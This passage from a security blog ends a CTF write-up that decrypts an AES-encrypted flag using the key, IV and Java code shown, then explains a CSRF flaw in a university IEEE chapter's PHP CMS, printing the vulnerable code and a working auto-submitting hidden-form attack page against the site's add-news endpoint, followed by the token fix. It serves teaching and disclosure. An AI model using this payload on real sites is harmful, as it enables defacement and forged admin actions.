    return appconfig;
}
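
To make the column mapping concrete, here is a small Python sketch that pulls the same two columns out of the config table and turns them into bytes the way encrypt() appears to: the key is hex-decoded, while the IV string is used as raw characters. The load_key_and_iv name is made up for illustration, and the demo uses an in-memory table mirroring the row shown above rather than the real assets/db.db. It also assumes that hexStringToBytes() is a plain hex decode, as its name suggests, and that getBytes() yields one byte per character, which holds for these ASCII-only values.

```python
import sqlite3


def load_key_and_iv(conn):
    """Read the AES key and IV from the first row of the config table.

    Column 4 holds the IV and column 5 holds the key, matching getConfig().
    """
    row = conn.execute("SELECT * FROM config").fetchone()
    iv_text, key_hex = row[4], row[5]
    key = bytes.fromhex(key_hex)      # assumed equivalent of hexStringToBytes(s1)
    iv = iv_text.encode("ascii")      # assumed equivalent of s2.getBytes()
    return key, iv


# In-memory stand-in for assets/db.db, holding the row from the sqlite3 output.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE config (a, b, c, d, e, f, g, h, i)")
conn.execute(
    "INSERT INTO config VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)",
    (1, 2, 2014, 0, "a5efdbd57b84ca36",
     "37eaae0141f1a3adf8a1dee655853714", 1000, "ctf.sharif.edu", 9),
)

key, iv = load_key_and_iv(conn)
print(len(key), len(iv))  # 16 16: an AES-128 key and a one-block IV
```

This is why the 32-character string has to be the key and the 16-character string the IV: after conversion, both come out at exactly 16 bytes.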

Using the key, IV and expected encrypted output, I wrote a simple decryption program.

import java.util.*;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class blah {
    // omitted for brevity
    public static String bytesToHexString(byte abyte0[]) { ... }
    public static byte[] hexStringToBytes(String s) { ... }

    public static String decrypt(String s, String s1, String s2)
    {
        SecretKeySpec secretkeyspec = new SecretKeySpec(hexStringToBytes(s1), "AES");
        Cipher cipher = null;
        byte[] key = null;
        try {
            cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, secretkeyspec, new IvParameterSpec(s2.getBytes()));
            key = cipher.doFinal(hexStringToBytes(s));
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new String(key);
    }

    public static void main(String args[]) {
        String e = "29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84";
        String iv = "a5efdbd57b84ca36";
        String key = "37eaae0141f1a3adf8a1dee655853714";
        System.out.println(decrypt(e, key, iv));
    }
}

$ java blah
fl-ag-IS-se-ri-al-NU-MB-ER
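
As a sanity check on that output, the sizes line up with PKCS#5 padding: the recovered string is 26 bytes, which pads up to 32 bytes, and the expected ciphertext is 64 hex characters, i.e. 32 bytes. The padded_length helper below is a hypothetical name used only to show the arithmetic in Python; it performs no encryption.

```python
AES_BLOCK_SIZE = 16  # bytes


def padded_length(plaintext_len, block_size=AES_BLOCK_SIZE):
    """Length after PKCS#5/PKCS#7 padding, which always adds 1..block_size bytes."""
    return (plaintext_len // block_size + 1) * block_size


flag = "fl-ag-IS-se-ri-al-NU-MB-ER"
expected_hex = "29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84"

print(len(flag))                         # 26
print(padded_length(len(flag)))          # 32
print(len(bytes.fromhex(expected_hex)))  # 32
```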

Thanks for reading!

Abusing Admin Privileges via CSRF

Exploiting a classic CSRF vulnerability

When I took over responsibility as the webmaster for Northeastern University’s IEEE student chapter around January 2014 (yes, this is a very belated post), I was suddenly responsible for maintaining a custom LAMP stack Content Management System (CMS) whose core functionality was letting an admin post to a news feed on the front page of the site. This site has since been completely redone, but given that it is notoriously difficult to program securely in PHP, I decided to poke around a little and see if I could find any cool bugs.

Initially, I started looking for the most blatant web vulns, SQLi and XSS, but was pleasantly surprised to find an input sanitization check in, for example, the register.php file that handles user registration.

if ((isValid($_POST['newusername']))&&(isValid($_POST['newpassword'])))
{
    // continue with registration
}

where isValid() looks like

function isValid($varx)
{
    $valid = true;
    $bad_stuff = array("#","(",")","<",">","?","/","\\","[","]","|","$","'",":",";", "@");
    for($index = 0; $index < strlen($varx); $index++) {
        if(in_array(substr($varx,$index,1), $bad_stuff)) {
            $valid = false;
        }
    }
    if(substr($varx, 0, 1) == " ") {
        $valid = false;
    }
    return $valid;
}

This code has a pretty substantial blacklist of characters commonly used in injections. It iterates over each character of the questionable input and sets the $valid variable to false if the character is in the blacklist. This seems to be an effective technique for ensuring the input is safe to use; however, OWASP tends to discourage this model.
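
To illustrate the difference between the two models, here is a rough Python port of the blacklist check next to an allowlist alternative. Both function names and the specific allowlist pattern (letters, digits and underscores, 3 to 32 characters) are assumptions made for this example, not something the original CMS used.

```python
import re

# Same characters as $bad_stuff in the PHP isValid() above.
BAD_STUFF = set("#()<>?/\\[]|$':;@")

# Hypothetical allowlist: only letters, digits and underscores, 3-32 characters.
ALLOWED_USERNAME = re.compile(r"[A-Za-z0-9_]{3,32}")


def is_valid_blacklist(value):
    """Port of isValid(): reject listed characters and a leading space."""
    if value.startswith(" "):
        return False
    return not any(ch in BAD_STUFF for ch in value)


def is_valid_allowlist(value):
    """Accept only values made entirely of explicitly permitted characters."""
    return ALLOWED_USERNAME.fullmatch(value) is not None


for candidate in ["alice_01", "bob<script>", 'eve" OR 1=1 --']:
    print(repr(candidate), is_valid_blacklist(candidate), is_valid_allowlist(candidate))
```

The blacklist lets the third value through because the double quote, equals sign and hyphen are not on the list, whereas the allowlist rejects anything it was not explicitly told to expect.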

After ruling this out of potential vulns, I looked a little deeper into the code that powered the posting of news to the website, add-news.php.

Here we can see that if the HTTP request is a “POST” and either the PHP session variable “isadmin” is set to “yessir” or “isofficer” is set to “true”, then the code that adds news gets executed.

if ($_SERVER['REQUEST_METHOD'] == "POST")
    {
        include("ieee-lib.php");
        if(isset($_SESSION['isadmin']) || isset($_SESSION['isofficer']))
        {
            if($_SESSION['isadmin'] == "yessir" || $_SESSION['isofficer'] == "true")
            {
                // add news

After these access checks pass, the POST request data is processed and ultimately a SQL query string is generated.

// continued from above
$title = htmlspecialchars($_POST['news_title'], ENT_QUOTES);
$text = htmlspecialchars($_POST['post'], ENT_QUOTES);
{ ... } // some omitted stuff
$user_query = "SELECT user_id, username FROM " . $INFO['sql_prefix'] . "users WHERE username = '" . $_SESSION['username'] . "'";
$user_result = mysql_query($user_query);
if($user_result)
{
    //Returns an array with the data from the SQL select statement
    $user_row = mysql_fetch_row($user_result);

    $query1 = "INSERT INTO " . $INFO['sql_prefix'] . "news (news_title, news_type, time_posted, time_meeting, news_body, author_id, author_name, meeting_location) ";
    $query2 = "VALUES ('" . $title . "', '" . $type_of_news . "', '" . time() . "', '" . $time_of_meeting . "', '" . $text . "', '" . $user_row[0] . "', '" . $user_row[1] . "', '" . $meetinglocation . "')";
    $add_news_query = $query1 . $query2;
    $add_news_result = mysql_query($add_news_query);

    if($add_news_result)
    {
        header('Location: http://www.ieee.neu.edu/?page=addnews&success=true');
    }
    else
    {
        header('Location: http://www.ieee.neu.edu/?page=addnews&error=unable_to_post_news');
    }
}
// done

The important part to notice here is that there is no code that ensures the legitimacy of the request, that is, that a currently authenticated admin user actually meant to make this request. In this scenario if we can somehow find a way to get the admin to submit an arbitrary POST request to the add-news.php page, since she already has the session all set up in her browser, we can bypass the session checks previously shown and add arbitrary news to the website, for example.

You might be wondering how we can get the admin to submit arbitrary POST requests without her noticing. The most obvious answer is physical access to her machine while she’s away or something, but a much more realistic scenario is getting the admin to browse to a web page that we (the attacker) control, where we can use some nifty JavaScript magic to get her browser to automatically submit the proper POST request on our behalf.

This is called Cross-Site Request Forgery (CSRF).

It turns out that these types of malicious pages are actually very simple to write. Remember, all that’s really needed is JavaScript execution, so for example if you had previous knowledge of a site that the admin frequented that had an XSS vulnerability, that would be a perfect way to chain these attacks. Anyway, here’s an example malicious page 1.

<!DOCTYPE HTML>
<html>
<body>
    <h1>non-malicious website! :)</h1>
    <form id="thisform" action="http://www.ieee.neu.edu/add-news.php" method="POST"
          style="display:none;">
        <input type="text" name="news_title" value="breaking news: u got hacked" />
        <input type="text" name="post" value="insert website defacement here" />
        <input type="submit"/>
    </form>
    <script type="text/javascript" charset="utf-8">
        var frm = document.getElementById("thisform");
        frm.submit();
    </script>
</body>
</html>

Nothing fancy here, just a simple hidden form with the values you want to submit to the page, and some JS that submits the form.

A caveat: Yes, it is true that you would have to guess the proper field names (“post”, “news_title”), but even if you can only guess “post”, you can write anything into the body of the news post.

End result looks something like this.

There was an identical bug in the code that handles editing users. Let’s have some fun!

In both of these gifs, the admin user was logged in, and then they opened a malicious html file, simulating visiting a malicious website. The mere act of opening the web page triggered the payload which sent the POST to the server, adding the news, and changing the user.

So how do we fix this sort of thing? The most common way involves the server requiring a randomly generated, non-predictable token that is associated with the user session with each request. An example could be that every time the actual admin web interface form is loaded, it contains a hidden field, invisible to the admin, with this token that is sent along with the request. The server verifies that it sent this token out previously, and that the token hasn’t expired, and if everything else checks out, the request goes through. This crucial missing piece of information will prevent attackers from successfully faking requests as the authenticated user.
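
A minimal Python sketch of that token scheme, assuming the session is a plain dict kept on the server. The function names, the csrf_token key and the 15-minute lifetime are all made up for illustration; a real application would normally lean on its framework’s built-in CSRF protection instead.

```python
import hmac
import secrets
import time

TOKEN_LIFETIME_SECONDS = 15 * 60  # hypothetical expiry window


def issue_csrf_token(session, now=None):
    """Create an unpredictable token, remember it in the session, and return it
    so it can be embedded in a hidden form field."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    session["csrf_issued_at"] = now
    return token


def is_request_legitimate(session, submitted_token, now=None):
    """Check that the submitted token matches the session's and has not expired."""
    now = time.time() if now is None else now
    expected = session.get("csrf_token")
    issued_at = session.get("csrf_issued_at")
    if not expected or not submitted_token or issued_at is None:
        return False
    if now - issued_at > TOKEN_LIFETIME_SECONDS:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


session = {}
token = issue_csrf_token(session, now=1000.0)
print(is_request_legitimate(session, token, now=1060.0))             # genuine form post
print(is_request_legitimate(session, "attacker-guess", now=1060.0))  # forged request
print(is_request_legitimate(session, token, now=1000.0 + 3600))      # expired token
```

Since the attacker’s page has no way to read the token tied to the admin’s session, the hidden form from the earlier example would fail this check.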


  1. For more examples of how to trigger your CSRF payload via JavaScript, check out the excellent Ruby on Rails Security Guide